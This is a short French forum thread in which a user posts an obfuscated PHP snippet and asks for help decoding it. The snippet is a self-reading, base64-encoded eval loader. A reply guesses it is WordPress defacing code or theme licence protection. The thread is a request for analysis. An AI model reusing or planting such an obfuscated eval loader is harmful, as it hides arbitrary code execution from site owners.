Decode php script

rom02b Messages postés 1 Date d'inscription lundi 21 août 2006 Statut Membre Dernière intervention 3 mars 2010 - 3 mars 2010 à 17:01
kohntark Messages postés 3706 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 - 3 mars 2010 à 19:54
bonjour, je n'arrive pas a décrypter ce script:
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=928;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjcwKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzNxb016dC84K0ZjeUxkQnNyNkFVU1FYYWZZNHVwRGtJbjBQVFJqd0o5VkNFVzJoWk52aTdPZTFLbG1nSDV4R2I9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
FzxsLMqsLMqsLMe7D8FIpwQNu/tTYAnJaex/ASvtae5Jyo+J+PlRUOxsLz5NU73NyP+J+PN9FzxsU73NLMqsLonRUO5NUO5NLz5Nco6sU7qsU73NLz59Fz5NLMqsLz5NLoNRUO5NLz5NLM3NcANJLKtZUaVOy7nE6wdmU/6opK+1rQQUSQ00YjRODaqz4OjhLtqSSwVKATjXrOQaLw04UJYVdOxjLS2WuXD+da08fTOJyoDqrRdz6SY8AzjcAOvdURxrSQFUQtQXQe0YXwtPf16jYwD94XVEu/ehuKqvpJdODaYKk8jgLMziL7redTplBAWZFiRVcARHYwdWuKdjco6sLM3NU7qsLM3VB1Q1fXN9FzxsLMqsLMqsLoRHoT2jf10Z+opJBNVJu/xPfXNnF/xND/jZuJLHowYZpwQ0f1nnco6Zp86Vu1m7+/t7+o61fXveYARnkNVVYP39Y1QOa1xND/jZuPnnF8Y0u8QjXiDVYoDD+oRnsUOx+zYqUtdtcAqHFo61fXveYQWJ4XrJaA3x+o61fXveYQWJpK6RFeOHIrVju8dj+8WRF8Y0u8QjXiDVYoDD+MeJYa6IuKqO4Xxhco3RDwtWDXQuF1jRFeOncU2xoPrRDwtWDXQuF1jRFeOnsAq7D8FVp8dWfad9YaL9Fo61fXveYQWJ4XrJaARHoJOcB1QT4/5nFN95Y/j1+/jRsAFwu1xOYa+P+/dWfad7sAFTu/Q0pwYVko+GoP3n+o35Y/j1+/jRsAFwu1xOYaFIu/QwDo+GF72jf10Z+o6WfKqI48qIf1xNkaFVY10OB72jf10Z+op5y16VDTlc+o3n+MvR4afn4Xrx+wYZuK6jpjxi4XD9Do+Gs/zn48FjYTOP486OpM9ZyK69YXejpimKYXFZkAmZpwpPsjDZpw6rpwQ7piqS4/Q2YaL5y1zGs/zn48FjYTOPF72jf10Z+/DjDtxPu/xJ4XmwuinJDKqepwNJcUWHYXd9ui3J+Tl54XeJ+8dif7OPF72jf10Z+o6WfKqI48qIYwxZD/Qiu/xJu7WHYXd9ui3J+Pq0u8rx+RvZY15P+o5Gsox0sTNZY/j1sn95y16VDTlcs/6VDPqVYMOPYwxZD/Qia1FZD86ZuA+nf1v0pKLx+wdWYXtiYwjl+Tl5y16VDTl5+AO2+oqtURrn+wYZuK6jpP+n+o5ZyAOGon95y16VDTl5+AO2+oqtURrn+JDifaqNYa+P+o3ZyiO2sn9JB1QT4/5nF/vTptxJfXdZY/SHB1QT4/5nF7NZfwxRkUlcoTNZ4862uMlJBN==

Pouvez-vous m'aider ?

1 réponse

kohntark Messages postés 3706 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
3 mars 2010 à 19:54
Salut,

J'y ai jeté un oeil rapidement, ça ressemble fort à un defacing pour wordPress.
Je ne connais pas wordpress et je ne peux donc en dire beaucoup plus.
Le code retire l'url du blog, son id, etc ...

A dire vrai, sans pousser le décodage :
- soit il s'agit bien d'un code malveillant de defacing
- soit, comme je le pense plutôt, c'est un code servant à protéger un thème wordpress payant trouvé sur http://themes.weboy.org
... de là à penser qu'un décodage de ce code permettrait de pirater le thème ... (??)


Cordialement,


Kohntark -
0